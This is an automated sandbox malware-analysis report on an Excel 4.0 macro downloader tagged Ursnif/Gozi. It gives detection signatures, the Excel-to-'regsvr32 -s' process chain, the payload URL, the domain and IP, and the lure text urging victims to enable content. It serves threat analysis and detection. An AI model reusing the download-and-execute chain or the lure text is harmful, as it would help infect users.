Loading ...

Play interactive tourEdit tour

Analysis Report document-1333887362.xls

Overview

General Information

Sample Name:document-1333887362.xls
Analysis ID:324313
MD5:d73c6ac8fe30f97b9751740e5990cf40
SHA1:66f33cf632df26d83ef1ecac6df9a0dd7471adda
SHA256:943972111562181bc947f598310ba1868a32a18ad8344419af1e4654e472c49a
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1204 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2320 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1333887362.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1333887362.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1204, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2320

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1333887362.xlsVirustotal: Detection: 35%Perma Link
    Source: document-1333887362.xlsReversingLabs: Detection: 44%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: excel.exeMemory has grown: Private usage: 4MB later: 55MB
    Source: global trafficDNS query: name: fu5on.com
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.212.179.162:443
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 67.212.179.162:443
    Source: Joe Sandbox ViewIP Address: 67.212.179.162 67.212.179.162
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: unknownDNS traffic detected: queries for: fu5on.com
    Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
    Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: regsvr32.exe, 00000003.00000002.2104615466.0000000001D70000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: document-1333887362.xlsString found in binary or memory: https://fu5on.com/ds/231120.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Screenshot number: 8Screenshot OCR: Enable Content X I J15 " "," jR " A B C D E F G H I K L M N O P Q R S T Y 301 302 303 304
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1333887362.xlsInitial sample: CALL
    Source: document-1333887362.xlsInitial sample: CALL
    Source: document-1333887362.xlsInitial sample: CALL
    Source: document-1333887362.xlsInitial sample: CALL
    Source: document-1333887362.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1333887362.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1333887362.xlsOLE indicator, VBA macros: true
    Source: document-1333887362.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/11@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CEDE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD587.tmpJump to behavior
    Source: document-1333887362.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: document-1333887362.xlsVirustotal: Detection: 35%
    Source: document-1333887362.xlsReversingLabs: Detection: 44%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1333887362.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Masquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1333887362.xls35%VirustotalBrowse
    document-1333887362.xls14%MetadefenderBrowse
    document-1333887362.xls45%ReversingLabsDocument-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    fu5on.com1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    https://fu5on.com/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    fu5on.com
    67.212.179.162
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://fu5on.com/ds/231120.gifdocument-1333887362.xlsfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2104615466.0000000001D70000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    67.212.179.162
    unknownUnited States
    32475SINGLEHOP-LLCUSfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:324313
    Start date:29.11.2020
    Start time:05:52:48
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 24s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:document-1333887362.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLS@3/11@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
    • Report size getting too big, too many NtDeviceIoControlFile calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    67.212.179.162document-1322008235.xlsGet hashmaliciousBrowse
      document-1322008235.xlsGet hashmaliciousBrowse
        document-1353534916.xlsGet hashmaliciousBrowse
          document-1353534916.xlsGet hashmaliciousBrowse
            document-1359580495.xlsGet hashmaliciousBrowse
              document-1359580495.xlsGet hashmaliciousBrowse
                document-135688950.xlsGet hashmaliciousBrowse
                  document-135688950.xlsGet hashmaliciousBrowse
                    document-1363041939.xlsGet hashmaliciousBrowse
                      document-1363041939.xlsGet hashmaliciousBrowse
                        document-1353330392.xlsGet hashmaliciousBrowse
                          document-1353330392.xlsGet hashmaliciousBrowse
                            document-1353428775.xlsGet hashmaliciousBrowse
                              document-1353428775.xlsGet hashmaliciousBrowse
                                document-1365485901.xlsGet hashmaliciousBrowse
                                  document-1363274030.xlsGet hashmaliciousBrowse
                                    document-1365485901.xlsGet hashmaliciousBrowse
                                      document-1363274030.xlsGet hashmaliciousBrowse
                                        document-1366355469.xlsGet hashmaliciousBrowse
                                          document-1366355469.xlsGet hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            fu5on.comdocument-1322008235.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1322008235.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353534916.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353534916.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1359580495.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1359580495.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-135688950.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-135688950.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363041939.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363041939.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353330392.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353330392.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353428775.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353428775.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1365485901.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363274030.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1365485901.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363274030.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1366355469.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1366355469.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            SINGLEHOP-LLCUSdocument-1322008235.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1322008235.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353534916.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353534916.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1359580495.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1359580495.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-135688950.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-135688950.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363041939.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363041939.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353330392.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353330392.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353428775.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353428775.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1365485901.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363274030.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1365485901.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363274030.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1366355469.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1366355469.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            7dcce5b76c8b17472d024758970a406bdocument-1425391613.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1442300824.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1423769819.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1322008235.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            2019-07-05-password-protected-Word-doc-with-macro-for-follow-up-malware.docGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353534916.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1443146531.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1359580495.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-135688950.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1490425384.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1453508098.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1443646287.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1452240368.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1476538535.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1363041939.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1442977347.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353330392.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1444203221.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1353428775.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162
                                            document-1481025349.xlsGet hashmaliciousBrowse
                                            • 67.212.179.162

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893
                                            Entropy (8bit):7.366016576663508
                                            Encrypted:false
                                            SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                            MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                            SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                            SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                            SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):326
                                            Entropy (8bit):3.1170519944677513
                                            Encrypted:false
                                            SSDEEP:6:kKkZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:8WkPlE99SNxAhUegeT2
                                            MD5:086CB49955AA6A8829A232EA84A44B00
                                            SHA1:E41D9148D90C34083BEB6C244CA1F0B1F2F99CF8
                                            SHA-256:908C8037A1152A264EA7EC93B50A205BADD5BA32E2347B5EF2D04DF7E8AC8FDF
                                            SHA-512:4EE1495C7374412CACF831F595898B64C22A1544198982B6D7647BCE20751603664B9D3F936DF32FA472346D5F19F4A2CB3E5B6E1623254FE1DBE58937868DE0
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... .........,|.W...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252
                                            Entropy (8bit):3.0294634724686764
                                            Encrypted:false
                                            SSDEEP:3:kkFkltowIlfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKMowIvliBAIdQZV7eAYLit
                                            MD5:B130F7C1DBE617F6092AC356ADAC088A
                                            SHA1:3C30A5B412F2492249C862E27EA79C5D5F922E6C
